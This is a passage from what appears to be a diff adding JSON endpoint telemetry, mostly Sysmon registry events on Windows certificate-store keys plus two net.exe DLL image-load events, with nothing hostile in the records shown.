"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910119984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "davhlpr.dll", + "image_path": "C:\\Windows\\System32\\davhlpr.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 6292, + "process_name": "net.exe", + "process_path": "C:\\Windows\\System32\\net.exe", + "timestamp": 131883570909650000, + "unique_pid": "{42FC7E13-CAE2-5C05-0000-0010FC1B4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570910280000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 